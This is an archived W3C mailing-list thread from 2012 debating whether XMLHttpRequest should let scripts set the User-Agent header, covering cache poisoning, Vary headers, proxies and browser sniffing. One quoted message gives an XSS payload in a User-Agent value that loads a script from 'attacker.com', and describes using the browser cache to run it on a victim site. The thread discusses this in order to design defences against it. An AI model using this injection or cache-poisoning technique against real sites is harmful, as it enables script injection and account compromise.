RE: RE: [XHR] Open issue: allow setting User-Agent?

2012-10-17 Thread Jungkee Song
 -Original Message-
 From: Hallvord Reiar Michaelsen Steen [mailto:hallv...@opera.com]
 Sent: Wednesday, October 17, 2012 3:50 PM
 
   The point is that a browser can act as if every single server response
   included Vary: User-Agent.  And perhaps should.  Intermediary caches
   _certainly_ should.
 
 
 
 Good suggestion.


But my concern was that even if the browser acts as such, an intermediary 
cache would still return forged content from its cache rather than making a 
fresh request to the origin server. That is, authors would expect to be free 
from the cache-poisoning threat based on the spec, but that might not be true 
when a caching proxy is involved. Unless the server itself actually puts Vary: 
User-Agent in the response, we cannot entirely avoid the cache-poisoning 
scenario.


Jungkee

 Julian Aubourg wrote:
   I'm still more concerned about potentially legitimate use cases of
  User-Agent filtering that could lead to security breaches when removing
  User-Agent from the non-modifiable list. But if no-one else feels like
  there could ever be such a legitimate use-case
 
 
 So far we haven't heard from anyone who has seen or implemented such a
 solution in real life ;-).
 
 
  I don't disagree with taking the User-Agent header out of the
  non-modifiable list as long as we resolve the possible issues. Before we
  make a decision, I would like to bring up some other issues found in an
  article [1]:
 
 (quoted from [1])
   A few of the problems include:
 
   1. Many websites will return only error pages upon receiving a UA header
  over a fixed length (often 256 characters).
 
  Should the spec specify a maximum length for header values set by script?
 
 
 
 I think the spec should try to allow JS authors to work around buggy
 servers rather than attempting to work around server bugs ourselves. This
 may be a general issue with header lengths, though, just seen more
 frequently with User-Agent because of all the junk some setups add to it.
 But I don't think it makes sense to mandate that the second argument to
 setRequestHeader() must be less than 256 characters.
 
 
 If anything, this makes it more useful to be able to set User-Agent - if
 you're writing an app for users with lots of junk in the UA string and
 want to load data from a server that can't handle that ;-)
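 
 (A minimal sketch of that workaround, assuming the proposal to allow
 setting User-Agent is adopted; the resource URL is hypothetical and the
 255-character cut-off is illustrative, taken from the article's figure:)
 
 var xhr = new XMLHttpRequest();
 xhr.open('GET', '/data.json'); // hypothetical resource
 // Keep the value under the length that reportedly trips up some servers
 // by truncating the browser's own UA string.
 xhr.setRequestHeader('User-Agent', navigator.userAgent.slice(0, 255));
 xhr.send();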
 
 
   2. In IE7 and below, if the UA string grows to over 260 characters,
  the navigator.userAgent property is incorrectly computed.
 
  An IE-specific case. I don't think we would change navigator.userAgent
  with an XHR request.
 
 
 
 Correct. This doesn't apply.
 
 
   3. Poorly designed UA-sniffing code may be confused and misinterpret
  tokens in the UA.
 
  Sanitizing the header value could be considered.
 
 
 
 We could, but figuring out some sensible rules that will handle the world
 wild web's poorly designed sniffing would take us a while ;-)
 
   4. Poorly designed browser add-ons are known to misinterpret how the
  registry keys are used, and shove an entire UA string into one of the
  tokens, resulting in a nested UA string.
 
 
 This problem doesn't apply to us.
 
   5. Because UA strings are sent for every HTTP request, they entail a
  significant performance cost. In degenerate cases [2], sending the UA
  string might consume 50% of the overall request bandwidth.
 
 
 
 Also something that's probably best left to the JS author's unpredictable
 needs IMO.
 -Hallvord
 
 
  [1] http://blogs.msdn.com/b/ieinternals/archive/2009/10/08/extending-the-user-agent-string-problems-and-alternatives.aspx
  [2] http://brianary.blogspot.com/2009/07/internet-explorer-user-agent-spam.html
 
 
  Jungkee
 
 --
 Hallvord R. M. Steen
 Core tester, Opera Software
 
 
 





Re: RE: RE: [XHR] Open issue: allow setting User-Agent?

2012-10-17 Thread Hallvord Reiar Michaelsen Steen

The point is that a browser can act as if every single server response
included Vary: User-Agent.  And perhaps should.  Intermediary caches
_certainly_ should.
  
  
  
  Good suggestion.
 
 

 But my concern was that even if the browser acts as such, an intermediary
 cache would still return forged content


I guess UAs *could* add a Cache-control: no-cache request header when getting a 
resource that was previously retrieved with a different UA string - this is 
getting very fiddly though.
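
(A sketch of that heuristic in pseudo-JavaScript; the browser-internal
names here are hypothetical, not a real API:)

// Run by the browser before sending a request (hypothetical internals):
function prepareRequest(request, cache) {
    var cached = cache.lookup(request.url);
    if (cached && cached.requestUserAgent !== request.getHeader('User-Agent')) {
        // The resource was previously fetched with a different UA string;
        // force revalidation instead of reusing or refreshing the cache
        // entry under a mismatched UA.
        request.setHeader('Cache-Control', 'no-cache');
    }
}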

-- 
Hallvord R. M. Steen
Core tester, Opera Software








Re: [XHR] Open issue: allow setting User-Agent?

2012-10-17 Thread Aryeh Gregor
(I noticed people talking about this on IRC and commented, and zcorpan
pointed me to this thread.)

On Tue, Oct 16, 2012 at 7:08 PM, Boris Zbarsky bzbar...@mit.edu wrote:
 The point is that a browser can act as if every single server response
 included Vary: User-Agent.  And perhaps should.  Intermediary caches
 _certainly_ should.

In terms of correctness, yes, but that will make them useless as
caches.  If a moderate number of users with an assortment of browsers
are using the same caching proxy, it's entirely possible that no two
of them have the same exact User-Agent string.  Varying on User-Agent
in a heterogeneous browser environment is going to drop your cache hit
rate to the point where the cache hurts performance more than it
helps.

Proxy caching is always going to break some pages, because not all
pages serve correct caching headers.  This can cause them to break
just due to browser cache too, but more caching is going to break them
more.  So proxy caching is always a correctness-performance tradeoff.
In practice, the loss in correctness is not worth the added
performance for most users, which is why most Internet users are not
(I think?) behind any sort of client-side proxy caching layer.  (I'm
not counting reverse proxies here.)  Where the performance gain is
worth it, such as behind an expensive or high-latency link, users will
just have to be trained to try pressing Ctrl-F5 if pages break.



Re: [XHR] Open issue: allow setting User-Agent?

2012-10-17 Thread Boris Zbarsky

On 10/17/12 12:17 AM, Jungkee Song wrote:

Yes, that could solve the issue, but it seems we cannot avoid the
intermediary caching-proxy problem unless the server actually puts Vary:
User-Agent in every response. I'm wondering if it's still worth putting it
into the spec.


Again, any intermediary proxy that doesn't assume that is in practice 
broken with real-world content...



Should we specify the length of the header that the script allows in the
spec?


That does not seem necessary.  In particular, the only thing this would 
hurt is the script making the request, right?



3. Poorly designed UA-sniffing code may be confused and misinterpret

tokens in the UA.

Sanitizing the header value could be considered.


Yes.

-Boris



Re: [XHR] Open issue: allow setting User-Agent?

2012-10-17 Thread Boris Zbarsky

On 10/17/12 3:36 AM, Jungkee Song wrote:

But my concern was that even if the browser acts as such, an intermediary cache would 
still return forged content from its cache rather than making a fresh request to the 
origin server. That is, authors would expect to be free from the cache-poisoning threat 
based on the spec, but that might not be true when a caching proxy is involved. Unless 
the server itself actually puts Vary: User-Agent in the response, we cannot entirely 
avoid the cache-poisoning scenario.


That's true.  And while such a caching proxy would, once again, be 
broken on real-world content, that doesn't help the security situation.


Does sanitizing the UA value to exclude certain chars (most 
particularly, '<' and company) help enough here?
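
(A minimal sketch of the kind of sanitization being discussed; the exact
character set is an assumption, not anything specified:)

// Strip characters that could let an echoed UA value break out into
// markup; '<' is the critical one for the script-injection scenario
// discussed in this thread.
function sanitizeUserAgent(value) {
    return value.replace(/[<>"'&]/g, '');
}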


-Boris



Re: [XHR] Open issue: allow setting User-Agent?

2012-10-17 Thread Boris Zbarsky

On 10/17/12 4:34 AM, Hallvord Reiar Michaelsen Steen wrote:

I guess UAs *could* add a Cache-control: no-cache request header when getting a resource 
that was previously retrieved with a different UA string - this is getting very 
fiddly though.


Hmm.  In a similar vein, UAs could send Cache-control: no-cache on requests 
that have a custom UA set via XHR.  It's tempting.


-Boris




Re: [XHR] Open issue: allow setting User-Agent?

2012-10-16 Thread Julian Aubourg
I tend to agree with Boris on this one.

Couldn't we simply state in the spec that browsers must add the User-Agent
header to the Vary list, all the time? That would instantly solve the
attack-from-the-cache problem, right? No need to sanitize the data, no need
to negotiate anything between both ends.

If that's the only security threat, it actually seems quite simple to
disable.

I'm still more concerned about potentially legitimate use cases of
User-Agent filtering that could lead to security breaches when removing
User-Agent from the non-modifiable list. But if no-one else feels like
there could ever be such a legitimate use-case, then I don't think we
should hold back because of this out-of-cache XSS attack: let's just
specify User-Agent has to be in Vary all the time. It's not like it will
break caching in the general case anyway.

Le mardi 16 octobre 2012, Boris Zbarsky a écrit :

 On 10/16/12 8:44 AM, Hallvord Reiar Michaelsen Steen wrote:

  xhr=new XMLHttpRequest();
  xhr.setRequestHeader('User-Agent',
  '--><script src="http://attacker.com/malice.js"></script><!--');


 For what it's worth, I would have no problem sanitizing the header value
 for User-Agent if we allow script to set it, or throwing on certain values;
 I can't think of any legit use cases for values containing '', since no
 actual UAs do that.

  and then requests /publicdata/index.htm . Once the request reaches
 readyState=4, attacker's page does

  location.href='http://www.victim.com/publicdata/index.htm';

 The browser has a fresh copy - loaded with the xhr request just
 milliseconds ago - and fetches the page from cache. Voila, the browser is
 now rendering a victim.com page with a link to malice.js included and
 the attacker can do whatever from the JS now running in the scope of the
 site.


 Again, Vary: User-Agent is the answer here, from the browser's point of
 view.  I agree that this would be good to discuss in a security
 implications section.  The spec could even require that responses to XHR
 with custom UA simply not be cached, if we want to play it safe.

  so the threat scenario relies on the remote server being stupid enough to
 do that and yet be careless about echoing non-sanitised User-Agent strings
 back to the page. Which is basically the negotiation scenario Julian
 earlier said he would agree to, and the reason I'm still pondering if it
 would be worth the extra complexity to allow it for cross-domain requests
 only...but this sort of cache poisoning scenario is a concern..


 Right, I agree it's a concern.  I think it's an easy one to address for
 this narrow use case.

 -Boris




Re: [XHR] Open issue: allow setting User-Agent?

2012-10-16 Thread Mark Baker
On Tue, Oct 16, 2012 at 11:21 AM, Boris Zbarsky bzbar...@mit.edu wrote:
 Again, Vary: User-Agent is the answer here, from the browser's point of
 view.

Agreed.

 I agree that this would be good to discuss in a security implications
 section.  The spec could even require that responses to XHR with custom UA
 simply not be cached, if we want to play it safe.

That would be an improvement, but wouldn't solve the problem of
intermediary cache poisoning.

Julian Aubourg wrote:
 Couldn't we simply state in the spec that browsers must add the User-Agent 
 header to the Vary list, all the time?

Vary is a response header, set by the server.

Mark.



Re: [XHR] Open issue: allow setting User-Agent?

2012-10-16 Thread Boris Zbarsky

On 10/16/12 1:04 PM, Mark Baker wrote:

That would be an improvement, but wouldn't solve the problem of
intermediary cache poisoning.


Ah, yes. Intermediary caches are indeed a problem.  I don't see anything 
the browser can do to solve that problem, unfortunately.


On the other hand, caches that don't assume Vary: User-Agent are 
already completely broken on the web when they sit between multiple 
users using multiple browsers and the rest of the web



Julian Aubourg wrote:

Couldn't we simply state in the spec that browsers must add the User-Agent 
header to the Vary list, all the time?


Vary is a response header, set by the server.


The point is that a browser can act as if every single server response 
included Vary: User-Agent.  And perhaps should.  Intermediary caches 
_certainly_ should.
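
(Concretely, an intermediary cache following this advice would fold the
request's User-Agent value into its cache key; a sketch, with hypothetical
names:)

// Key cache entries as if every response carried Vary: User-Agent. An
// entry stored for one UA string can then never be served to a request
// carrying a different one, which defeats the poisoning attack.
function cacheKey(request) {
    return request.method + ' ' + request.url + '#' +
           request.getHeader('User-Agent');
}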


-Boris




Re: [XHR] Open issue: allow setting User-Agent?

2012-10-16 Thread Julian Aubourg


 The point is that a browser can act as if every single server response
 included Vary: User-Agent.  And perhaps should.  Intermediary caches
 _certainly_ should.


Yes, that was my point. Act as if User-Agent were part of the Vary response
header.


Re: [XHR] Open issue: allow setting User-Agent?

2012-10-16 Thread Mark Baker
On Tue, Oct 16, 2012 at 1:08 PM, Boris Zbarsky bzbar...@mit.edu wrote:
 The point is that a browser can act as if every single server response
 included Vary: User-Agent.  And perhaps should.  Intermediary caches
 _certainly_ should.

I don't have enough experience with that scenario to agree or
disagree, but if you feel strongly that the world would be better off
with this, you should make your case to the HTTP WG. It's possible it
would be considered out of scope for httpbis since it would seem to
change the protocol in an incompatible way. But it would at least get
on the radar for HTTP 2.0.

Mark.



RE: [XHR] Open issue: allow setting User-Agent?

2012-10-16 Thread Jungkee Song
 -Original Message-
 From: Boris Zbarsky [mailto:bzbar...@mit.edu]
 Sent: Wednesday, October 17, 2012 2:09 AM
 
 On 10/16/12 1:04 PM, Mark Baker wrote:
  That would be an improvement, but wouldn't solve the problem of
  intermediary cache poisoning.
 
 Ah, yes. Intermediary caches are indeed a problem.  I don't see anything
 the browser can do to solve that problem, unfortunately.
 
 On the other hand, caches that don't assume Vary: User-Agent are
 already completely broken on the web when they sit between multiple
 users using multiple browsers and the rest of the web

  Julian Aubourg wrote:
  Couldn't we simply state in the spec that browsers must add the User-
 Agent header to the Vary list, all the time?
 
  Vary is a response header, set by the server.
 
 The point is that a browser can act as if every single server response
 included Vary: User-Agent.  And perhaps should.  Intermediary caches
 _certainly_ should.


Yes, that could solve the issue, but it seems we cannot avoid the
intermediary caching-proxy problem unless the server actually puts Vary:
User-Agent in every response. I'm wondering if it's still worth putting it
into the spec.


Julian Aubourg wrote:
 I'm still more concerned about potentially legitimate use cases of
User-Agent filtering that could lead to security breaches when removing
User-Agent from the non-modifiable list. But if no-one else feels like there
could ever be such a legitimate use-case, then I don't think we should hold
back because of this out-of-cache XSS attack: let's just specify User-Agent
has to be in Vary all the time. It's not like it will break caching in the
general case anyway.

I don't disagree with taking the User-Agent header out of the non-modifiable
list as long as we resolve the possible issues. Before we make a decision, I
would like to bring up some other issues found in an article [1]:

  (quoted from [1])
 A few of the problems include:
 
 1. Many websites will return only error pages upon receiving a UA header
over a fixed length (often 256 characters).

Should the spec specify a maximum length for header values set by script?

 2. In IE7 and below, if the UA string grows to over 260 characters, the
navigator.userAgent property is incorrectly computed.

An IE-specific case. I don't think we would change navigator.userAgent with
an XHR request.

 3. Poorly designed UA-sniffing code may be confused and misinterpret
tokens in the UA.

Sanitizing the header value could be considered.

 4. Poorly designed browser add-ons are known to misinterpret how the
registry keys are used, and shove an entire UA string into one of the
tokens, resulting in a nested UA string.
 5. Because UA strings are sent for every HTTP request, they entail a
significant performance cost. In degenerate cases [2], sending the UA string
might consume 50% of the overall request bandwidth.
 

[1] http://blogs.msdn.com/b/ieinternals/archive/2009/10/08/extending-the-user-agent-string-problems-and-alternatives.aspx
[2] http://brianary.blogspot.com/2009/07/internet-explorer-user-agent-spam.html


Jungkee




RE: [XHR] Open issue: allow setting User-Agent?

2012-10-15 Thread Jungkee Song
 -Original Message-
 From: Boris Zbarsky [mailto:bzbar...@mit.edu]
 Sent: Sunday, October 14, 2012 12:49 AM
 
 On 10/13/12 5:08 AM, Hallvord R. M. Steen wrote:
  I came across an article [1] that describes some of the reasoning for
  Flash's change in security policy when it banned setting User-Agent.
  Apparently, some sites echo the User-Agent value back in markup in
  certain contexts (maybe a browser requirements page for example).
 
 And naturally do not send Vary: User-Agent?

I'm not sure what Hallvord assumed here, but if a certain backend intends to 
provide its content under some browser requirements, isn't Vary: User-Agent 
sort of a required header for any related caching proxy to work correctly? 
Otherwise, subsequent requests for the same resource with a different 
User-Agent string would be regarded as a cache HIT by the caching proxy anyway.

Anyway, the point here is that if changing User-Agent is allowed in script, 
it will be possible for a malicious third party to set arbitrary User-Agent 
strings when generating XSS attacks.

To which Hallvord wrote:
  So it seems reasonable to keep the limitation on setting User-Agent. 

+1.

  (I'm still wondering if we could lift it only for the cross-domain case 
  where the target site must opt in to receiving a changed UA string though..)

-1. I don't know if there can be any smart way, but as of now I don't think 
it is a good idea to make the availability of setRequestHeader('User-Agent', 
...) depend on the choice of a certain backend.


Jungkee


 
  However, another threat might be using an XHR request to put a
  generated page with injected content in the browser's cache, then
  opening the page directly in a new window. The page would likely be
  taken from cache
 
 This seems simple enough to deal with on the browser side: Assume Vary:
 User-Agent on all requests.  Probably a good idea anyway.
 
 -Boris




Re: [XHR] Open issue: allow setting User-Agent?

2012-10-15 Thread Boris Zbarsky

On 10/15/12 7:18 AM, Jungkee Song wrote:

but if a certain backend intends to provide its content under some browser 
requirements, isn't Vary: User-Agent sort of a required header for any 
related caching proxy to work correctly?


Yes, it is, but it's rare for websites to think about that sort of thing 
in my experience.


In particular, I have yet to encounter a site that both does server-side 
UA sniffing _and_ sends Vary: User-Agent.



Otherwise, subsequent requests for the same resource with a different 
User-Agent string would be regarded as a cache HIT by the caching proxy anyway.


Indeed.


Anyway, the point here is that if changing User-Agent is allowed in script, 
it will be possible for a malicious third party to set arbitrary User-Agent 
strings when generating XSS attacks.


While true, a third party can already do this with things like botnets, 
no?  I'm not sure I see the additional threats here.  Can you explain?


-Boris



RE: [XHR] Open issue: allow setting User-Agent?

2012-10-15 Thread Jungkee Song
 -Original Message-
 From: Boris Zbarsky [mailto:bzbar...@mit.edu]
 Sent: Monday, October 15, 2012 9:50 PM
 
 On 10/15/12 7:18 AM, Jungkee Song wrote:
  but if a certain backend intends to provide its content under some browser
 requirements, isn't Vary: User-Agent sort of a required header for any
 related caching proxy to work correctly?
 
 Yes, it is, but it's rare for websites to think about that sort of thing
 in my experience.
 
 In particular, I have yet to encounter a site that both does server-side
 UA sniffing _and_ sends Vary: User-Agent.

Yes, I think it's very rare. I found that a Korean web portal site, Naver, 
does send "Vary: Accept-Encoding,User-Agent" in response to requests for 
http://www.naver.com and http://m.naver.com, though.

  Otherwise, subsequent requests for the same resource with a different
 User-Agent string would be regarded as a cache HIT by the caching proxy anyway.
 
 Indeed.
 
  Anyway, the point here is that if changing User-Agent is allowed in
 script, it will be possible for a malicious third party to set arbitrary
 User-Agent strings when generating XSS attacks.
 
 While true, a third party can already do this with things like botnets,
 no?  I'm not sure I see the additional threats here.  Can you explain?

From that perspective, I don't think setting the User-Agent string in script 
poses any unknown threats. However, it seems like we would be permitting 
another avenue that is as simple as calling a JavaScript function.

FYI, here is another article [1] written about the compatibility problems of 
changing the UA string at runtime.

[1] 
http://blogs.msdn.com/b/ieinternals/archive/2009/10/08/extending-the-user-agent-string-problems-and-alternatives.aspx


Jungkee




Re: [XHR] Open issue: allow setting User-Agent?

2012-10-13 Thread Hallvord R. M. Steen
I came across an article [1] that describes some of the reasoning for  
Flash's change in security policy when it banned setting User-Agent.  
Apparently, some sites echo the User-Agent value back in markup in  
certain contexts (maybe a browser requirements page for example).  
Being able to set User-Agent from web content thus might cause XSS  
issues for such pages. These backends never had any reason to filter  
the User-Agent string before, so they probably don't.


Obviously, any XSS-injected scripts would not run as a result of  
simply loading the content with XHR (or Flash) - scripts in the  
response are not executed unless more steps are taken like jQuery's  
global eval taking SCRIPT tags from received markup and inserting them  
into the page. However, another threat might be using an XHR request  
to put a generated page with injected content in the browser's cache,  
then opening the page directly in a new window. The page would likely  
be taken from cache, and the XSS would be successful. So it seems  
reasonable to keep the limitation on setting User-Agent. (I'm still  
wondering if we could lift it only for the cross-domain case where the  
target site must opt in to receiving a changed UA string though..)


[1] http://www.securityfocus.com/archive/1/441014




Re: [XHR] Open issue: allow setting User-Agent?

2012-10-13 Thread Boris Zbarsky

On 10/13/12 5:08 AM, Hallvord R. M. Steen wrote:

I came across an article [1] that describes some of the reasoning for
Flash's change in security policy when it banned setting User-Agent.
Apparently, some sites echo the User-Agent value back in markup in
certain contexts (maybe a browser requirements page for example).


And naturally do not send Vary: User-Agent?


However, another threat might be using an XHR request to put a
generated page with injected content in the browser's cache, then
opening the page directly in a new window. The page would likely be
taken from cache


This seems simple enough to deal with on the browser side: Assume Vary: 
User-Agent on all requests.  Probably a good idea anyway.


-Boris



RE: [XHR] Open issue: allow setting User-Agent?

2012-10-11 Thread Jungkee Song
I don't think this is a right-or-wrong discussion. There is valid rationale 
for both the pros and the cons.

Having mulled it over, I am leaning toward not removing User-Agent from the list 
of prohibited headers, at least in the current version. I admit that the use case 
is compelling to a certain group of authors (mainly for testing and analysis 
purposes) but I don't think it has consensus for the whole web. Besides, IMO 
browser spoofing, whether through the browser's main HTTP request or an XHR 
request, is not the ultimate way to handle browser-sniffing issues in practical 
service scenarios.

Jungkee

 -Original Message-
 From: Hallvord R. M. Steen [mailto:hallv...@opera.com]
 Sent: Wednesday, October 10, 2012 12:34 AM
 To: Julian Aubourg; annevankeste...@gmail.com
 Cc: Anne van Kesteren; Jungkee Song; public-webapps@w3.org
 Subject: Re: [XHR] Open issue: allow setting User-Agent?
 
 Julian Aubourg j...@ubourg.net wrote Tue, 09 Oct 2012 16:34:08 +0200
 
  I've had trouble writing extensions and user scripts to work around
  backend sniffing, due to being unable to simply set User-Agent for a
  specific script-initiated request and get the correct content. As
 I've
  attempted to explain to Anne, I think this experience is relevant to
  scripts using CORS, because they also want to interact with backends
 the
  script author(s) don't choose or control.
 
   If the backend sniffs out (all or some) browsers, it's the backend's
  choice.
 
 We end up in a philosophical disagreement here :-) I'd say that whatever
 browser the user decides to use is the user's choice and the server should
 respect that.
 
  CORS has been specified so that you NEED a cooperative backend.
  Unlock a header and some other means to sniff you out will be found and
  used :/
 
 Anne van Kesteren also makes a similar point, so I'll respond to both:
 
  If you consider CORS you also need to consider that if we allow
  developers to set user-agent a preflight request would be required for
  that header (and the server would need to allow it to be custom). So
  it's not quite that simple and would not actually help.
 
 One word: legacy. For example Amazon.com might want to enable CORS for
 some of its content. The team that will do that won't necessarily have any
 intention of blocking browsers, but will very likely be unaware of the
 widespread browser sniffing in other parts of the Amazon backend. (With
 sites of Amazon's or eBay's scale, there is in my experience simply no
 single person who is aware of all browser detection and policies). Hence,
 there is IMO non-negligible risk that a large web service will be
 cooperative on CORS but still shoot itself in the foot with browser
 sniffing.
 
 If I write, say, a CORS content aggregator, I would want it to run in all
 browsers, not only those allowed by the content providers. And I'd want to
 be in control of that. Hence, in my view this issue is mostly a trade-off
 between something script authors may need and more theoretical purity
 concerns.
 
  The changed User-Agent will of course only be sent with the requests
  initiated by the script, all other requests sent from the browser will
  be normal. Hence, the information loss will IMO be minimal and probably
  have no real-world impact on browser stats.
 
  var XHR = window.XMLHttpRequest;
 
  window.XMLHttpRequest = function() {
      var xhr = new XHR(),
          send = xhr.send;
      xhr.send = function() {
          xhr.setRequestHeader( "User-Agent", "OHHAI!" );
          return send.apply( this, arguments );
      };
      return xhr;
  };
 
 Yes, this could give a generic library like jQuery less control of the
 contents of *its* request. However, there will still be plenty of requests
 not sent through XHR - the browser's main GET or POST for the actual page
 contents, all external files loaded with SCRIPT, LINK, IMG, IFRAME, EMBED
 or OBJECT, all images from CSS styling etc. Hence I still believe the
 information loss and effect on stats will be minimal.
 
 Also, the above could be a feature if I'm working on extending a site
 where I don't actually fully control the backend - think a CMS I'm forced
 to use and have to work around bugs in even if that means messing with how
 jQuery sends its requests ;-).
 
  If your backend really relies on User-Agent header values to avoid
  being
  tricked into malicious operations you should take your site offline
  for a
  while and fix that ;-). Any malicious Perl/PHP/Ruby/Shell script a
  hacker
  or script kiddie might try to use against your site can already fake
  User-Agent
 
 
  Oh, I agree entirely. Except checking User-Agent is a quick and painless
  means to protect against malicious JavaScript scripts. I don't like the
  approach any more than you do, but we both know it's used in the wild.
 
 I'm afraid I don't know how this is used in the wild and don't fully
 understand your concerns. Unless you mean we should protect dodgy SEO
 tactics sending full site contents to Google bot UAs but a paywall block
 to anyone else from user-applied scripts trying to work around that?

Re: [XHR] Open issue: allow setting User-Agent?

2012-10-11 Thread Hallvord R. M. Steen
Jungkee Song jungkee.s...@samsung.com wrote Thu, 11 Oct 2012 10:56:53 +0200


IMO browser spoofing, whether through the browser's main HTTP request or an  
XHR request, is not the ultimate way to handle browser-sniffing issues in  
practical service scenarios.


Well, it would be a lot nicer to write specs for an ideal ultimate world  
for sure ;-)


In *this* world, this limits what script authors can do in a way that will  
leave them unable to solve some problems.
However, that MAY still be a reasonable decision if there are good reasons  
to do so! I agree with you that this is a judgement call with both pros  
and cons.


In this specific case I don't understand the full reasoning behind the  
limitation. Some of the rationale sounds more like "we think somebody once  
may have said it would cause a security problem". And I would like us to  
have a stronger rationale and more evidence when we limit what authors are  
allowed to do.


Maybe other members of public-webapps could help me out by suggesting  
threat scenarios and use cases where this limitation seems relevant?


--
Hallvord R. M. Steen
Core tester, Opera Software



Fwd: [XHR] Open issue: allow setting User-Agent?

2012-10-11 Thread Julian Aubourg
Sorry, I've been cut off by keyboard shortcuts :P

... so the burden of proof is on *you*. *You* have to establish the
consequences of making a backward-incompatible change. Not brush away
arguments, pro or con, to advance your agenda. Did you ask backend devs
why they white-listed browsers? Did you try and educate them? Did you ever
encounter any sensible use-case for this? Do you really want to break a lot
of backends' expectations because you don't see the reason?

You have to be very careful with breaking backward compatibility. Just look
at jQuery's bug tracker for a prime example of what happens when you do.

We don't have to prove it is useful. We just have to prove it is used and
*you* brought this up yourself. Now you want to bypass this by pretty much
hacking client-side. Please make a compelling case for it.

 I still don't fully understand the scenario(s) you have in mind.

You're confusing the script's origin with the site's origin. XHR requests
from within a script are issued with the origin of the page that the script
is included into.

Now, read back your example but suppose the attack is to be pulled against
cnn.com. At a given time (say cnn.com's peak usage time), the script issues
a gazillion requests. Bye-bye server.

That's why I took the ad example. Hack a single point of failure (the ad
server, a CDN) and you can DOS a site using the resource from network
points all over the net. While the frontend dev is free to use scripts
hosted on third-parties, the backend dev is free to add a (silly but
effective) means to limit the number of requests accepted from a browser.
Simple problem, simple solution and the spec makes it possible.

Note that this use-case has nothing to do with filtering out a specific
browser btw. Yet you would break this with the change you propose.

Maybe it's not the best of examples. But I came up with this in something
like 5 minutes. I can't imagine there are no other ways to abuse this.

 This is a way more interesting (ab)use case. You're presuming that there
 are web-exposed backend services that are configured to only talk to other
 backend servers, and use a particular magic token in User-Agent as
 authentication? If such services exist, does being able to send a
 server-like UA from a web browser make them significantly more vulnerable
 than being able to send the same string from a shell script?

Same as above: single point of failure. You hack into a server delivering a
shared resource and you have as many unwilling agents participating into
your attack.

So far I see that only Jarred seems to like the idea (in this thread
anyway):

 I agree with Hallvord, I cannot think of any additional *real* security
 risk involved with setting the User-Agent header.  Particularly in a CORS
 situation, the server-side will (should) already be authenticating the
 origin and request headers accordingly.  If there truly is a compelling
 case for a server to only serve to Browser XYZ that is within scope of the
 open web platform, I'd really like to hear that.

By that line of reasoning, I don't see why we need preflight in CORS and
specific authorisation from the server-side for content to be delivered
cross-domain. It is not *open*. After all since any backend could request
the resource without problem, why should browsers be limited?

But then again, the problem has nothing to do with CORS but with
third-party scripts that effectively steal the origin of the page that
includes them and the single point of failure problem that arises. That's
why JavaScript is as sandboxed as it is.

In all honesty, I'd love to be convinced that the change is without
consequences, but the more I think about it, the less likely it seems.

-- Forwarded message --
From: Julian Aubourg j...@ubourg.net
Date: 11 October 2012 14:47
Subject: Re: [XHR] Open issue: allow setting User-Agent?
To: Hallvord R. M. Steen hallv...@opera.com



We end up in a philosophical disagreement here :-) I'd say that whatever
 browser the user decides to use is the user's choice and the server should
 respect that.


I'm sorry but that's complete nonsense. The backend is the provider of the
data and has every right when it comes to its distribution. If it's a
mistake on the backend's side (they filter out browsers they didn't intend to),
just contact the backend's maintainer and have them fix this server-side
problem... well... server-side.

You're trying to circumvent a faulty server-side implementation by breaking
backward compatibility in a client-side spec. If you can't see how
wrong the whole idea is, I'm afraid you didn't have to suffer the
consequences of such drastic changes in the past (I had to with script-tag
injection, and it was just a pure client-side issue, nothing close to what
you're suggesting in terms of repercussions).



 One word: legacy. For example Amazon.com might want to enable CORS for
 some of its content. The team that will do that won't necessarily have any
 intention

Re: [XHR] Open issue: allow setting User-Agent?

2012-10-11 Thread Glenn Maynard
On Thu, Oct 11, 2012 at 8:09 AM, Julian Aubourg j...@ubourg.net wrote:

  I still don't fully understand the scenario(s) you have in mind.

 You're confusing the script's origin with the site's origin. XHR requests
 from within a script are issued with the origin of the page that the script
 is included into.

 Now, read back your example but suppose the attack is to be pulled against
 cnn.com. At a given time (say cnn.com's peak usage time), the script
 issues a gazillion requests. Bye-bye server.


I'm confused.  What does this have to do with unblacklisting the User-Agent
header?

That's why I took the ad example. Hack a single point of failure (the ad
 server, a CDN) and you can DOS a site using the resource from network
 points all over the net. While the frontend dev is free to use scripts
 hosted on third-parties, the backend dev is free to add a (silly but
 effective) means to limit the number of requests accepted from a browser.
 Simple problem, simple solution and the spec makes it possible.


Are you really saying that backend developers want to use User-Agent to
limit the number of requests accepted from Firefox?  (Not one user's
Firefox, but all Firefox users, at least of a particular version,
combined.)  That doesn't make sense at all.  If that's not what you mean,
then please clarify, because I don't know any other way the User-Agent
header could be used to limit requests.

-- 
Glenn Maynard


Re: [XHR] Open issue: allow setting User-Agent?

2012-10-11 Thread Mike Taylor

Julian,

On Thu, 11 Oct 2012 08:09:07 -0500, Julian Aubourg j...@ubourg.net wrote:


... so the burden of proof is on *you*. *You* have to establish the
consequences of making a backward-incompatible change. Not brush away
arguments, pro or con, to advance your agenda. Did you ask backend devs
why they white-listed browsers? Did you try and educate them? Did you ever
encounter any sensible use-case for this? Do you really want to break a lot
of backends' expectations because you don't see the reason?


I personally have contacted hundreds of sites for these types of issues  
over the past few years. We've done the education, outreach, evangelism,  
etc. Success rates are very low, the majority are simply ignored.



We don't have to prove it is useful. We just have to prove it is used and
*you* brought this up yourself. Now you want to bypass this by pretty much
hacking client-side. Please make a compelling case for it.


I'm sorry but that's complete nonsense. The backend is the provider of the
data and has every right when it comes to its distribution. If it's a
mistake on the backend's side (they filter out browsers they didn't intend to),
just contact the backend's maintainer and have them fix this server-side
problem... well... server-side.


This isn't feasible. There's a whole web out there filled with legacy  
content that relies on finding the string "Mozilla" or "Netscape", for  
example. See also the requirements for navigator.appName,  
navigator.appVersion, document.all, etc. You can't even get close to  
cleaning up the mess of legacy code out there, so you work around it. And  
history repeats itself today with magical strings like "Webkit" and  
"Chrome".


What of new browsers, how do they deal with this legacy content? The same  
way that current ones do, most likely -- by pretending to be something  
else.


<aside>

The burden of proof is on you. *You* ha

Emphasis with asterisks seems unnecessarily aggressive. Perhaps  
unintentionally so. :)

</aside>

Cheers,

--
Mike Taylor
Opera Software



Re: [XHR] Open issue: allow setting User-Agent?

2012-10-11 Thread Julian Aubourg
 I personally have contacted hundreds of sites for these types of issues
 over the past few years. We've done the education, outreach, evangelism,
 etc. Success rates are very low, the majority are simply ignored.


I'm sorry to hear that. I really am. Still trying to have people stop
browser sniffing client-side. :(


 I'm sorry but that's complete nonsense. The backend is the provider of the
 data and has every right when it comes to its distribution. If it's a
 mistake on the backend's side (they filter out browsers they didn't intend to),
